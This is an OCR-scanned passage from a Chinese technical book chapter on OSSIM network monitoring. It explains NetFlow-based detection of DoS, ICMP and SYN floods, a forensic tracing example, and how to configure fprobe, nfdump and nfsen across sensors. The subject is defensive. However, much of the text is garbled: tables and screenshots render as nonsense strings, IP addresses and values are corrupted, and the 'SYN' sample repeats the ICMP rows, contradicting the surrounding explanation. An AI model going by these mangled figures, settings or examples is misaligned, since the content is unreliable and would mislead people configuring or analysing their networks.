表 8-3 筛选 的 NetFlow 数据 
WIP 源 端 口 ”目的 1P 目的 端口 ”协议 报 文 数 字 节 数 B/PK TOS Flag 
[66190144166 | 6000 | 20210210233 | 1433 | Tc [i Jao — |4o foo |svw | 
[66190144166 | 600 | 0210210234 | 1333 — | Tcp [i Jao [4 [|o |svw 
[66190144166 | 6000 | 20210210235 | 1333 — | rcP [i | 


[190.144.166 | 600 | 202.102.10234 | 1433 | rc» | 
| 66.190.14.166 | 6000 | 202.102.10236 | 133 [rce |t — | 
puse [su | areas] ue-—iaoe- [| a [ac Diet 


例 5: 用 NetFlow 分 析 DOS 攻击 流量 。 

DoS 攻击 采用 大 量 非 正常 的 数据 流量 ， 攻 击 网 络 设备 或 其 接 入 的 服务 器 ， 致 使 网 络 设备 
的 性 能 下 降 ， 或 占用 网 络 带 宽 ， 影 响 其 他 相关 用 户 流 量 的 正常 通信 。 例 如 Dos 可 以 利用 TCP 
协议 的 缺陷 ,通过 SYN 打开 半 开 的 TCP 连接 ， 占 用 系统 资源 ， 使 合法 用 户 被 排斥 而 不 能 建立 
正常 的 TCP 连接 。 以 下 为 一 个 典型 的 DoS SYN 攻击 的 NetFlow 数据 实例 , 该 案例 中 多 个 伪造 
的 源 卫 同时 向 一 个 目的 IP 发 起 TCP SYN 攻击 。 


111.*.68.351202.*.*.8010thers1648511312110000110000161114011 
105.*.93.91|202.*.*.80|0thers|64851|3|215557/5928|6|1|40|1 
158.*.25.208/202.*.*.80|0thers|64851|31|2|3330|10000/6|11|40|1 
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日 常 工作 中 发 现 除了 遇 到 DOS. 以 外 还 有 许多 属于 DDOS 攻击 ,只 不 过 攻击 类 别 不 同 ， 
有 些 是 Ping Death， 有 些 是 SYN flooding。DDOS 攻击 基本 上 都 造成 这 样 一 种 结果 : 服务 器 无 
法 处 理 源源 不 断 的 请 求 ， 从 而 造成 响应 迟缓 ， 直 至 系统 资源 耗 尽 。 

因此 检测 ICMP 攻击 就 可 以 根据 下 面 的 条 件 : 在 连续 的 几 个 时 间 段 ， 假 设 每 个 时 间 段 为 5 
分 钟 ， 各 个 时 间 段 内 ICMP 报 文 大 于 5000。 符 合 这 个 条 件 的 ， 可 以 认为 受到 ICMP Kh, 
者 在 用 ICMP 发 起 攻击 ， 注 意 协议 01 表示 ICMP。 下 面 是 ICMP 流 的 NetFlow 实例 。 


Srcipaddress dstipaddress srcp dstp sif dif proto pkts octets 


117.234.230.118 67.32.45.33 0 800 0010 0000 01 1989 134920 
125.171.109.112 67.32.46.12 0 800 0010 0000 01 1904 122883 
112.173.199 122 68.44.34.22 0 800 0010 0000 01 1950 100225 


另外 ， 还 有 一 种 DOS 攻击 是 SYN flooding， 我 们 知道 TCP 协议 中 有 三 次 握手 ， 如 果 来 源 
IP 为 伪造 ， 那 么 三 次 握手 将 不 能 完成 ， 只 能 停留 在 SYN 状态 ， 于 是 一 个 TCP 连接 在 服务 器 端 
就 被 “ 挂 起 ”, 这 种 “ 挂 起 ”将 消耗 系统 资源 大 量 的 伪造 源 IP 发 起 的 SYN 在 服务 器 端 被 “ 挂 
起 ”， 直 至 系统 资源 消耗 殖 尽 ， 这 就 是 TCP SYN Flooding。 它 的 特征 是 TCP 报头 中 有 大 量 的 
SYN 特征 数据 包 。NetFlow 输出 格式 中 提供 了 Flag 位 ， 可 判断 为 SYN 攻击 。 

因此 ， 检 测 SYN flooding 的 条 件 是 : 在 连续 的 几 个 时 间 段 ， 假 设 每 个 时 间 段 为 5 分 钟 ， 
产生 大 量 flag=2 的 数据 包 ， 正 常 连接 不 会 产生 这 么 多 flag-2 的 数据 包 ， 所 以 可 以 设置 闵 值 为 
5000。 超 过 该 数值 就 认为 服务 器 受到 SYN flooding 攻击 。 如 果 主 机 发 出 flag=2 的 数据 包 数 量 
超过 1000， 则 可 以 认为 主机 在 发 起 攻击 ， 协 议 号 06 表示 TCP。 更 多 协议 号 的 表示 含义 可 以 通 
过 这 个 页 面 获得 : http:/zh.wikipedia.org/wikiIP (协议 号 列表 )。 

以 下 是 SYN 特征 的 NetFlow 实例 。 


Srcipaddress ^ dstipaddress srcp dstp sif dif proto pkts octets 


117.234.230.118 67.32.45.33 0 800 0010 0000 01 1989 134920 
125.171.109.112 67.32.46.12 0 800 0010 0000 01 1904 122883 
112.173.199 122 68.44.34.22 0 800 0010 0000 01 1950 100225 


总 之 ， 各 种 DDOS 攻击 都 是 在 短 时 间 内 产生 大 量 的 数据 包 ， 因 此 ， 即 使 不 知道 攻击 报 文 
的 特征 ， 也 可 以 在 NetFlow 的 输出 结果 中 进行 相应 的 查找 ， 找 到 符合 条 件 的 异常 Flow。 


8.24 NetFlow 与 谷歌 地 图 的 集成 显示 

在 OSSIM 中 OTX、Ntop 以 及 资产 管理 子 模块 通过 利用 Google Map API 实现 来 访 者 的 TP 
地 图 定位 ， 同 时 提供 对 IP、 域 名 归属 地 查询 服务 ， 同 样 在 NetFlow 中 也 集成 了 该 实用 功能 。 
在 源 IP 和 目标 IP. 处 均 显示 了 一 个 我 们 熟悉 的 谷歌 地 图 图 标 ， 单 击 后 就 可 以 定位 该 处 显示 IP 
的 位 置 ， 如 图 8-7 所 示 。 
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i 图 8-7 NetFlow 与 谷歌 地 图 的 集成 显示 
当地 图 无 法 显示 时 ， 需 要 利用 VPN 等 方法 确保 浏览 器 能 连接 到 谷歌 地 图 。 


8.25 ”其 他 异常 流量 检测 结果 分 析 

私有 IP 地 址 在 公 网 上 是 不 能 被 路 由 的 ， 只 能 用 于 局 域 网 内 部 ， 当 需要 与 互联 网 上 的 其 他 
主机 进行 通信 时 ， 需 要 使 用 NAT 技术 将 其 私有 TP 映射 为 可 以 路 由 的 合法 IP。 因 此 ， 当 发 现 有 
Wi IP 是 私有 地 址 的 数据 包 进入 企业 网 ， 那 么 可 以 断定 这 是 为 了 达到 某 种 目的 ， 而 伪造 源 匡 的 
数据 流 。 


例 6: NetFlow 在 网 络 取证 方面 的 应 用 。 

假设 图 8-8 中 的 ADSL 拨号 用 户 从 Internet 上 某 FTP 服务 器 上 下 载 了 可 疑 文件 , 在 客户 端 
PC 上 留 有 下 载 日 期 时 间 戳 信息 , 在 局 端的 接 入 服务 器 上 也 可 以 看 到 特定 TP 地 址 在 相应 时 间 内 
被 分 配给 客户 端 PC， 通过 在 ISP 方面 的 ANI CAutomatic Number Identification) 日 志 就 能 将 客 
户 端的 所 在 家 庭 电话 号 码 与 上 网 拨号 信息 联系 到 一 起 , 与 此 同时 , 在 ISP 的 路 由 器 上 记录 (一 
般 会 保留 30 天 左右 ) 着 FTP 下 载 /上 传 网 络 流量 (NetFlow) 日 志 ， 这 个 流量 至 关 重要 。 最 后 
在 FTP 服务 器 上 还 有 完整 的 下 载 记录 。 
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5^ua Fp Lol 


TACACS 日 志和 ANI 路 由 器 的 Netiow 流 | 登录 FTP 服 务 器 和 传 
日 期 时 间 融 日 志 记录 量 日 志 | 输 日 志 
J 


图 8-8 分 析 下 载 可 疑 文件 


由 上 图 可 以 看 出 ， 从 客户 端 发 起 一 直到 从 FTP 服务 器 下 载 分 为 四 个 阶段 ， 分 别 是 客户 端 
发 送 /接收 、 接 入 服务 器 验证 、 路 由 器 转发 及 FTP 服务 器 接收 下 载 ， 每 个 阶段 都 有 日 志 记录 信 
息 包含 用 户 账号 、 登 录 时 间 、 卫 、 端 口 、 发 送 数据 包 大 小 及 日 期 及 时 间 戳 等 。 这 些 日 志 信息 分 
别 存放 在 不 同 的 设备 上 ， 即 便 是 某 些 日 志 章 到 了 一 定 程度 破坏 (例如 算 改 了 P， 丢 失 了 某 些 日 
志 等 ) 也 不 会 影响 全 局 。 


-^ OSSIM 下 NetFlow 实战 


某 些 情况 下 ， 设 备 不 支持 NetFlow， 对 于 这 样 的 环境 也 有 相应 的 解决 方法 即使 用 Fprobe。 
如 果 没 有 支持 NetFlow 的 网 络 设备 , 可 以 利用 fprobe 来 生成 NetFlow RX, 其 格式 为 v5 版 本 。 
最 初 Fprobe 是 一 款 在 BSD 环境 下 运行 的 软件 ， 目 前 在 UNIX/Linux 平台 均 可 运行 。 它 可 以 将 
其 接口 收 到 的 数据 转化 为 NetFlow 数据 ， 发 送 至 NetFlow 分 析 端 。 我 们 可 以 通过 部 署 OSSIM 
服务 器 ， 将 网 络 流量 镜像 至 OSSIM 服务 器 以 实现 对 网 络 流量 NetFlow 分 析 。 在 路 由 器 上 配置 
NetFlow 方法 ， 很 多 资料 都 介绍 ， 本 节 不 再 效 述 。 


8.3.1 组 成 
OSSIM 服务 器 中 的 NetFlow， 由 下 列 3 个 工具 组 成 ， 分 别 是 : 
€  Fprobe: 从 远程 Sensor 主机 上 发 送 数据 流 , 在 Sensor 上 通过 输入 “ps -eflgrep fprobe” 
命令 即 可 查看 到 通信 进程 以 及 端口 。 
€ NfSen: 用 于 分 析 图 形 前 端 。 
€ Nfdump: 数据 采集 模块 。 


有 关 OSSIM 组 成 结构 在 第 1 章 介 绍 过 ， 这 里 先 看 它 是 如 何 分 析 NetFlow 数据 包 的 过 程 ， 
首先 在 网 络 接口 接收 网 络 数据 ， 然 后 由 fprobe 程序 将 收集 的 数据 按照 一 定 规则 和 格式 进行 转 
换 为 NetFlow 格式 ， 然 后 发 到 系统 的 555 端口 (通过 查看 /etc/default/fprobe)， 然 后 由 Nfsen 系 
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统 中 的 Nfdump 程序 将 转换 后 的 数据 存放 在 /var/cache/nfdump/flows/live/ 目 录 下 ， 最 后 由 Web 
前 端 程序 Nfsen 读 取 通过 555 端口 接收 的 数据 (可 通过 查看 /etc/ossim/ossim_setup.conf 中 的 
netflow_remote_collector_port 变量 的 值得 知 )， 反 映 在 前 台 Web 界面 上 (路 径 
Environment 一 NetFlow)， 分 析 NetFlow 过 程 如 图 8-9 所 示 。 在 OSSIM 系统 中 查询 NetFlow 流 
量 如 图 8-10 所 示 。 


之 入 


2.fprobe 收 集 数据 并 转化 为 
Netflow， 然 后 发 往 555 端 口 


3. 由 Nfdump 在 指定 目录 下 
接收 转换 后 的 Netf1ow 数 据 


1. Cisco 答 入 Netflow 


8-9 OSSIM 系统 分 析 NetFlow 数据 


Eis EH 
[一 Just rom Osvet Top [nos] 
Te 3 [v] 
| = a n e E 
ma 加 eeek 
Output [7 zit long 
FE 
DATE FLOW SEN ounou moro omon nowsw pg ewmm s ws oor 
i ze g mmm a 
SERA AT T N E E T AE E 
2050105120429.12 PEP cer woe 2168 mes vcn seno» o mo or 
MUTET TT EIU E DONEC END NEN 
TETTE UTC ES UG ERUISONEEESIOIDMNEUNEN RANT 
SUED Om. ITE TU SEE UNIES ONES 
VUE UNSER pue mm EET SEE 


SUMMARY total flows 4690 TOTAL BYTES 13.5 M TOTALPACKITS 50994 AVG BPS 27197 AVG PPS 12 AVG BPP 255 
TIMEWINDOW 2015-0105 220221 - 2015-01-05 250846 
TOTAL FLOWS PROCESSED 46:0 BLOCKS SKIPPED ) BYTES READ 244244 


8-10 NetFlow 流量 查询 
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NetFlow 数据 放置 于 以 日 期 为 单位 的 /var/cache/nfdump/flows/live/UUID/ 目 录 中 ， 存 储 为 二 
进 制 文件 格式 ,以 天 为 单位 分 别 设置 目录 以 方便 查看 , 这 些 数据 按照 一 定 的 时 间 组 织 起 来 , K 
集 数据 间隔 为 5 分 钟 , nfcapd 就 建立 新 的 文件 , 并 用 时 间 惟 来 命名 , 例如 nfcapd.2013053112035 
包含 的 数据 是 从 2013 年 5 H 31 H 12 小 时 35 分 钟 开始 的 数据 。 如 图 8-11 所 示 。 每 个 目录 存 
放 1 天 ， 总 共 288 个 文件 ， 每 个 文件 大 小 从 几 KB 到 十 几 MB 不 等 ， 例 如 : 


nfcapd. O nfcapd. 20150 

nfcapd. 5 nfcapd. 20150. 

fcapd. nfcapd. nfcapd. 20150 

5 nfcapd. nfcapd. 2 nfcapd. 20150 


50 nfcabd. nfcaod. 20150: 0 nfcapd. 20150502113 


图 8-11 nfcapd 产生 的 数据 
8.3.2 ”关键 参数 解释 
“LIST LAST 500 SESSIONS” 表 示 最 近 500 个 会 话 列 表 。 
“TOP 10 SRC IPS” 表 示 源 IP 地址 TOP 10. 
“TOP 10 DST IPS” 表 示 目 标 IP 地 址 TOP 10, 
“TOP 10 SRC PORT” 表示 源 端 口 TOP 10。 
“TOP 10 DST PORT” 表示 目标 端口 TOP 10。 
“TOP 10 PROTO” 表 示 协 议 TOP 10. 


^ 


TOP 10 表示 最 多 的 前 10 位 ， 分 布 式 环境 中 ， 部 署 了 多 个 Sensor, NetFlow 数据 存储 在 
OSSIM 服务 器 端 /var/cache/nfdump/flows/live/ 目 录 下 ， 不 同 的 Sensor 有 不 同 的 UUID, 就 
用 这 个 UUID 做 为 目录 来 存放 来 自 不 同 Sensor 的 NetFlow 数据 。 


F 
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从 系统 捕获 数据 包 的 过 程 来 看 ， Nfdump 过 程 至 关 重 要 , 它 包括 nfcpad、fddump、nfprofile 
和 nfreplay 这 几 个 进程 ， 功 能 见 表 8-4 所 示 。 


表 8-4 nfdump 工具 组 成 及 作用 


从 网 络 中 捕获 NetFlow 数据 ， 然 后 将 数据 存 到 文件 中 。 它 每 隔 n CE 
为 5m) 分 钟 在 这 些 文件 中 轮 询 一 次 ， 必 须 为 每 个 NetFlow 流 创建 一 个 
nfcapd 进程 

从 由 nfcapd 产生 的 数据 文件 中 解析 出 NetFlow 数据 并 显示 出 来 ， 它 能 够 
建立 大 量 关 于 IP 地址、 端口 等 的 Top N 统计 信息 ， 并 根据 设 定 顺序 显示 
出 来 

将 nfcapd 产生 的 数据 文件 中 解析 出 NetFlow 数据 ， 并 根据 指定 的 过 滤 集 
过 滤 NetFlow 数据 ， 并 将 结果 存 到 文件 中 
将 nfcapd 产生 的 数据 文件 转发 到 另 一 台 主机 


nfcapd 捕获 守护 进程 


2 nfdump 数据 挖掘 


3 nfprofile 分 析 器 


nfreplay 数据 转发 


如 果 /var/ 分 区 空间 耗 尺 ， 则 需要 清理 空间 ， 首 先 要 考虑 清理 /var/cache/nfdump/flows/ 下 
的 文件 。 


下 面 我 们 总 结 以 下 实施 流量 监控 步骤 : 

(1) 在 Cisco 6509 上 配置 NetFlow (或 其 他 网 络 设备 )， 并 输出 到 指定 到 OSSIM 采集 器 
IP 的 固定 UDP 端口 ; 

(2) 采集 器 软件 为 OSSIM 系统 的 Flow-tool 工具 ， 该 软件 监听 UDP 端口 ， 接 收 进 入 的 
NetFlow 数据 包 ， 并 存储 为 特定 格式 ; 

(3) 使 用 Nfsen 软件 包 中 的 工具 ， 对 NetFlow 源 文 件 进行 读 取 ， 并 转换 成 ASICII 的 可 读 
格式 ,再 用 OSSIM 内 的 Perl 程序 对 NetFlow 进行 分 析 和 规范 格式 等 操作 , 并 将 读 取 的 NetFlow 
信息 存储 入 OSSIM 数据 库 ; 

(4) 依据 蠕虫 和 DDOS 攻击 等 异常 报 文 的 流量 特征 ， 在 分 析 程 序 中 预 设 各 触发 条 件 ， 定 
时 运行 ， 从 中 发 现 满足 这 些 条 件 的 Flow: 

(5) 将 分 析 结 果 在 Web 客户 端 中 展示 。 


8.3.3 Sensor 中 启用 NetFlow 

当 我 们 首次 将 Sensor 连接 到 OSSIM Server 后 ,默认 NetFlow 功能 虽然 启用 但 并 没有 将 数 
据 发 送 至 NetFlow 采集 器 ,所 以 我 们 需要 在 Configuration 一 Deployment 一 Components 一 Sensors 
下 选择 对 应 Sensor， 首 次 添加 Sensor 时 在 Flows 选项 中 默认 UDP 端口 为 12000， 显 示 颜 色 为 
蓝 色 ， 为 了 以 示 区 别 建议 定义 其 他 醒目 颜色 ， 如 图 8-12 所 示 。 最 后 单 击 “CONFIGURE AND 
RUN ”按钮 , 与 此 同时 在 OSSIM Server 端的 /var/cache/nfdump/flows/live 目录 下 产生 一 个 UUID 
目录 ， 用 该 目录 存储 flow 数据 。 注 意 : 如 果 停 止 了 NetFlow 服务 ， 那 么 系统 就 会 删除 这 个 目 
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录 以 及 目录 下 所 有 的 flow 数据 。 在 “configuration help” 中 会 给 出 常见 网 络 设备 设置 Netflow 
和 sFlow 的 详细 方法 。 


图 8-12 添加 Sensor 的 默认 NetFlow UDP 端口 为 12000 


8.3.4 Nfsen 数据 流 的 存储 位 置 

在 OSSIM 系统 中 , NetFlow 收集 数据 流 是 由 /etc/nfsen/nfsen.conf 配置 文件 中 定义 ， 默 认 路 
径 为 /var/cache/nfdump/flows/。 由 此 看 出 ， 数 据 流 收集 源头 同样 在 该 配置 文件 的 %sources 参数 
中 配置 。 如 图 8-13 所 示 。 


|t Netflow sources 
|ë Define an ident string, port and colour per netflow source 


|t Required paraneters: 
ident identifies this netflou source. e.g. the router nane, 
Upstream provider nane eti 
port nfcapd listens on this port for netflou data for this source 
set port to '0' if you do not want a collector to be started 
col colour in nfsen graphs for this source 


Optional parameters 
type Collector type needed f ce. Can be 'netflow' or 
optarg Optional args to th 


sflow’. Default is netflou 


Syntax: 
'jident' => € "port" <portnun>’, =》 ’<colour>’, ’type’ => *<type> } 
Ident strings must be 1 to 19 characters long only, containing characters [a-zA-20-9_]. 


sour 
I "col’ => ’#0000ff’ , ’type’ 'netflou’ } 
'col' => 'Wff0048', 'type’ => 'netflow' ) 


图 8-13 NetFlow 中 数据 源 配置 
另外 ， 当 在 Sensor 上 启用 NetFlow 后 ,在 Server. 上 的 iptables 规则 会 自动 添加 一 条 规则 允 
VF sensor 将 收集 到 的 流 发 往 Server 端 UDP 12000 端口 ， 读 者 可 以 在 Server 端 通过 命令 检查 。 
# iptables -L |grep 12000 
若 添 加 第 二 个 Sensor, 并 启用 NetFlow, 则 端口 号 为 12001, 以 此 类 推 每 个 Sensor 的 NetFlow 
端口 号 不 能 重复 。 


这 是 OSSM 23 系统 中 的 配置 ， 在 OSSIM 4 系统 中 把 主机 名 换 成 了 类 仪 | 
“676A3FF2D6834353970D95DE0” 的 一 串 32 位 的 UUID 号 (字母 数字 的 组 合 ) ， 它 保 
| 证 收集 数据 流 的 网 络 接口 不 会 重复 。 例 如 : /etc/nfsen/nfsen.conf 配置 文件 如 图 8-14 所 示 。 J 
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*sources = ( 

'2898628009C944AB889D9AEB74C40F90' => ( 'port' => '555', 'col' => 'sO000ff', 'type' => 'netflow' 
H 
" ' 38CAF098C50A41E4ABC4BF83000FD944 => ( 'port' => '12000', 'col' => '#ff2600', 'type' => 'netflo 
w3} 
L 


8-14 /etc/nfsen/nfsen.conf 配置 文件 


如 果 修 改 了 nfsen.conf 配置 文件 ， 要 使 其 生效 需 执 行 以 下 命令 : 


#nfsen reconfig 


重启 nfsen 服务 : 


#/etc/init.d/nfsen restart 


下 面 我 们 查看 UUID 号 在 数据 库 中 的 位 置 ， 如 图 8-15 所 示 。 


alienvault:/var/cache/nfdump/flows/livef ls 
2898628009C944AB889D9AE874C40F90 38C4F098C5DA41E4A8C4BF83000FD944 
alienvault:/var/cache/nfdump/f lows/1ive& ossim-db 

Welcome to the MySQL monitor. Commands end with ; or Ag. 

Your MySQL connection id is 14634 

Server version: 5.5.33-31.1 Percona Server (GPL), Release 31.1 


Copyright (c) 2009-2013 Percona LLC and/or its affiliates 
Copyright (c) 2000, 2013, Oracle and/or its affiliates. All rights reserved. 


Oracle is a registered trademark of Oracle Corporation and/or its 
affiliates. Other names may be trademarks of their respective 
owners. 


Type 'help;' or 'Ah' for help. Type 'Nc' to clear the current input statement. 


mysql> USE alienvault; 

Database changed 

mysql> SELECT hex(id),name FROM sensor; 

4 + 

| hex(id) | nane | 

et 

| 4327ADFBBBC347809795B2107E53D218 | sensor | 

| 61465634045211E4831808002789E94E | alienvault | 
ei n + + 

2 rows in set (0.00 sec) 


mysqu B 
8-15. 查询 UUID 


在 分 布 式 OSSIM 环境 中 ， 用 不 同 颜色 表示 多 个 Sensor。 如 图 8-16 所 示 。 
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BES overvew GRAPH 
Profile: live. 
re ue ku ormer Profile info: 
ye me 
13 t * 2 Mac unlimited 
» x , lh z Exp: never 
blab Mr = ee Tie ws cs se em Start: Sep 05 2015 - 10:30 EDT 
Wed Sep 9 08:40:00 2015 Flows/s any protocol f | tstart 2015-09-09-08-40 
" (| tend. 2015-09-09-09-40 
I s Packets 
HET s 
E 
R ' sd 
Po / Té 
u » 
/ 三 
ED E pr up) P z 
B virtum usat inone 国 auienvautr GE 下 一 时 隙 ii 
B cient 向 后 12 小 时 _ 查询 时 间 Ut 
Qunsale Ostacked Graph 
sec (Trwa 73) | nm B 加 E 
FA 
4days 返回 上 一 时 隙 
ix CM 
- ST 2€eks 091015 000 
Lmenth 
CHANNEL X nows X Pus X marme 
ak Wk ud kme ohen alt emos © mg other alt wn ude leme other 
四 diene 回 75/s  A1/»v 36/s 13/5 00/s 351k/s | Lig {js 145k/s Sills  1378Mbís  22Mb/s B63kb/s  1558Mbís 16kb 
= 
四 aonwaou B 21/« osh 13/« O3j« aoje Siks 仙人。 Due 23/«  701Mbje a7okble 4ASkb/«  7ODMbs 7474b 


ÜjVitualUSMAllinne [| — 257/s  83/s 128/s 45/s 00/s 220k/s 3893/s  1Sk/s 201Ws 117/s 2274Mbls  17Mb/s 8&7Mb/s 2170Mbís 37kb 
ali tex udo amp chen o alt u is kmp obe al udp: lem other 
TOTAL is; sh Maj 64 tops 4i A 274 ang kga asa paaa MD MM 2 616 


图 8-16 多 个 Sensor 之 间 用 不 同 颜色 区 分 流量 大 小 


E 停止 NetFlow 服务 后 ， 才 可 更 改 显示 颜色 。 | 


8.8.5 NetFlows 抽样 数据 保存 时 间 

NetFlow 每 隔 5 分 钟 保存 一 次 数据 包 , 所 以 需要 定期 移 走 这 些 包 , 它们 保存 时 间 不 能 过 长 ， 
系统 默认 保存 45 天 。 实 际 应 用 中 大 家 可 以 根据 自己 磁盘 的 大 小 设置 ， 调 整 的 具体 路 径 为 
Configuration 一 Administration 一 Main 一 Backup，0 代表 永久 存储 ， 这 里 我 们 修改 为 15 X. 在 
这 里 有 关 存储 的 事件 条 数 的 限制 ， 默 认为 400 万 条 。 


8.3.6 NetFlow 的 读 取 方式 
读 取 NetFlow 数据 即 可 通过 命令 行 方式 ,也 可 图 形 化 方式 展现 , 作为 用 户 当然 是 喜欢 后 者 ， 
但 命令 行 读 取 方 式 同样 重要 。 


1. 命令 行 方式 
命令 行 方式 读 取 NetFlow 数据 ， 如 图 8-17 所 示 。 
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以 上 命令 读 
并 按 默 认 的 流 排序 /flo 


r/cache/ nf dunp, 


出 Ne 


E63C74B47 E62015-01_ 168 nfdump 
Sir) 
8 .91.129:443 


:615Z6 


命令 行 方式 读 取 NetFlow 数据 


tFlow 采样 。 查 看 采样 
ws， 也 可 以 按 字 节 /bytes 排序 ， 如 图 8-18 所 示 。 


疆 时 


mmm 'BBDGBFCCRSEG3C?74B47E6/2015-01-168 nfdump 


r nfcapd 


这 里 对 目标 地 址 进行 汇总 ， 


Top 10 Dst 1P 


Date 
915-01 
m 

01 

1 

01 

m 


inar 


first seen 
p 


16 
16 
16 
16 
16 
16 
16 
16 
16 


90 
o0 
o0 
[^] 
[^] 
90 
60 
90 


fiddr order. 


48 
49:47.293 
53:36 
49:51 
49:55 
49:49 
49:53 
49:47 


total flous 


by flows 
ration Proto Dst 
[^] 
468 
283 a 
472 a 
[T 


173 
173 
173 
173 
173 


194 
194 
194 
194 
194 


176865 
5-01-16 
Blocks skipped: 0 
28750.0 Wall 
dunp^f lous/1 ive 


By 


64.62 


IP Addr 


2 .168.91.129 


168.91.1 
168.91.2 
160.45 
27.146 
148 

m 

147 

144 


total packet 
9:53:39 


tes re 
flou 


图 8-18 


下 面 介 绍 图 形 化 方式 典型 架构 : Fprobe-nfsen 的 流量 分 析 。 
然后 让 fprobe 


开发 环境 、fprobe 及 libpcap-devel， 
例如 : 


# fprobe -i eth0 127.0.0.1:9995 


测试 是 否 收 到 NetFlow 数据 


#tcpdump -i lo port 9995 
tcpdump: 
listening on 1o, 
10:36:53.000221 


link-type EN10MB 


Flows(x Packets(z) 


598(56 


1，aug pps aug bpp 


读 取 Top10 


1^ 


Mo 为 环 路 接口 名 称 。 


verbose output suppressed, 


use -v or 


(Ethernet), 


166 


在 这 种 架构 中 ， 
监听 eth0 数据 并 输出 NetFlow 到 某 个 


10:37:03.000222 
10:37:13.000215 
10:37:23.000220 


UDP, 
UDP, 
UDP, 
UDP, 


EXT TE 201501160850 


lauses) EIowsl 
4 


201501160050 


首先 


3& Linux 


-vv for full protocol decode 
capture size 65535 bytes 

IP localhost.40448 » localhost.palace-4: 
IP localhost.40448 » localhost.palace-4: 
IP localhost.40448 » localhost.palace-4: 
IP localhost.40448 » localhost.palace-4: 


length 552 
length 792 
length 1224 
length 792 
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此 时 , 表示 已 经 成 功 地 将 端口 镜像 的 数据 转化 为 NetFlow 数据 ,并 发 送 至 本 机 的 UDP 9995 
端口 ， 接 着 安装 nfdump 和 nfsen。 


8.3.7 nfdump 的 作用 

nfdump 是 一 款 开 源 的 NetFlow 收集 、 存 储 、 过 滤 及 统计 分 析 软 件 。Nfsen 是 基于 nfdump 
的 Web 工具 ， 所 以 服务 器 需要 先 安装 LAMP 环境 。 当 然 ， 其 他 组 件 如 RRD Tool, Perl 模块 也 
必须 安装 。 接 着 安装 nfdump 工具 和 nfsen。 

最 后 修改 nfsen 配置 文件 并 重启 nfsen 进程 。 将 NetFlow 数据 流 发 送 到 nfsen 配置 好 的 端 
口 ， 即 可 浏览 Neflow 数据 。 这 几 个 步骤 看 着 虽然 不 复杂 ， 但 读者 亲自 实战 时 需要 费 些 功夫 ， 
各 种 报错 问题 时 常 出 现 。 在 Debian Linux 中 手动 安装 nfdump 的 效果 整体 上 和 OSSIM 中 的 
NetFlow 比 起 来 ， 功 能 仍然 相对 单一 。 


8.8.8 将 NetFlow 数据 集成 到 Web UI 的 仪表 盘 

出 于 用 户 观察 数据 需要 ， 常 需要 将 NetFlow 的 历史 数据 , 在 首页 仪表 盘 中 调用 。 下 面 介绍 
设置 方法 ， 系 统 默认 在 Dashboards 内 没有 启用 Network 监控 。 大 家 首先 进入 Overview 菜单 ， 
单 击 右 侧 签字 笔 状 图 标 骆 ， 会 立刻 出 现 如 图 8-19 所 示 的 界面 。 


+ EXECUTIVE + COMPLIANCE 


NETWORK FLOW- ICM 


y 3 05:44:56 2015 FU 


8-19 添加 到 仪表 盘 

在 图 8-19 中 单 击 斜 体 字 的 Network 按钮 ， 并 选择 “Show Tab” 选 项 ， 在 弹出 对 话 框 中 选 
择 确定 按钮 。 设 置 完成 后 ， 便 立即 在 Web UI 中 看 到 OVERVIEW 多 出 了 个 Network 按钮 ， 单 
击 此 按钮 即 可 预览 NetFlow 历史 数据 ， 如 图 8-20 所 示 。 


458 


第 8 章 OSSIM 流量 分 析 与 监控 


DASHBOARDS 


QA x El 


ANALYSIS ENVIRONMENT REPORTS 


OVERVIEW 


TICKETS SECURIT TAXONOMY NETWORK 


NETWORK FLOW- TCP NETWORK FLOW- UDP NETWORK FLOW -ICMP 


Sn May 3 05:33:08 2015 Flows/s prote TCP Sun May 3 05:33:08 2015 Fiovs/s proto UCP Sun Nay 3 05:39:08 2015 Flows; 


图 8-20 在 仪表 盘 中 显示 NetFlow 


8.3.9 DERAT NetFlow 数据 流 处 理 

本 小 节 内 容 是 对 上 述 知识 点 的 总 结 , 下 面 这 个 实验 在 一 个 模拟 的 分 布 式 环境 中 完成 , 其 中 
有 一 台 混合 安装 的 OSSIM USM， 两 台 Sensor， 三 台 接 入 层 交 换 机 ， 一 台 核 心 交换 机 以 及 若干 
PC 组 成 ,为 简化 实验 ,， 这 些 设备 均 布 署 在 同一 个 VLAN 中 ,实际 生产 中 Sensor 应 分 布 在 多 个 
VLAN。 拓扑 如 图 8-21 所 示 。 


et 


图 8-21 OSSIM 分 布 式 部 署 
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第 2 章 讲解 了 如 何 添加 Sensor， 并 与 Server 进行 连接 ， 下 面 接着 启用 NetFlow 服务 ， 交 
换 机 上 NetFlow 也 必须 同时 设置 正确 ， 注 意 不 同 Sensor 主机 中 的 nfcapd 进程 分 别 在 12000 和 
120001 端口 进行 监听 。 各 主机 IP、UUID 及 端口 如 表 8-5 所 示 。 注 意 Sensor 是 集成 在 完全 安 
装 的 OSSIM USM 中 ， 即 192.168.11.105 的 传感器 ，SensorA 和 SensorB 都 只 配 了 一 块 网 卡 。 


表 8-5 Ossim 服务 器 传感器 配置 


主机 名 1P UUID NetF | ow 端口 安装 方式 
SensorB |192.168.11.207  |73e61ef5-d3c5-4168-a8fe-556 1bf5e903b 12001 Sensor 

[Sensor __[192.168.11.105_[5644b430-3295-cb66-ae8a-8141c00f6233 — |sss — [UsM 完全 安装 | 
前 面 已 经 讲 过 查看 UUD 的 方法 ， 下 面 依次 在 终端 下 输入 如 下 命令 : 

对 于 Sensor 192.168.11.105， 操 作 如 下 : 


VirtualUSMAllInOne:~# cat /etc/alienvault/system-id 
564db430-3295-cb66-ae8a-8141c00£6233 


对 于 SensorA 192.168.11.138， 操 作 如 下 : 


alienvault:~# cat /etc/alienvault/system-id 
cd8a4e60-bb14-4e4e-99a0-3700d8ec73aa 


对 于 SensorB 192.168.11.207， 操 作 如 下 : 


alienvault:~# cat /etc/alienvault/system-id 
73e61ef5-d3c5-4168-a8fe-5561bf5e903b 


所 有 数据 存储 在 Ossim Server 端 ， 接 下 来 最 重要 的 步骤 需要 将 SensorA, SensorB 采样 数 
据 流转 发 到 192.168.11.105 主机 上 ， 这 一 点 在 Web UI. 上 并 没有 直接 的 界面 ， 操 作 如 下 : 

在 SensorA 上 操作 : 

#/usr/sbin/fprobe -i eth0 -fip 192.168.11.105:12000 

在 SensorB 上 操作 : 

#/usr/sbin/fprobe -i eth0 -fip 192.168.11.105:12001 


大 家 在 实验 室 ， 不 可 完全 照搬 命令 ，192.168.11.105 主机 后 面 的 端口 12000、12001 是 在 
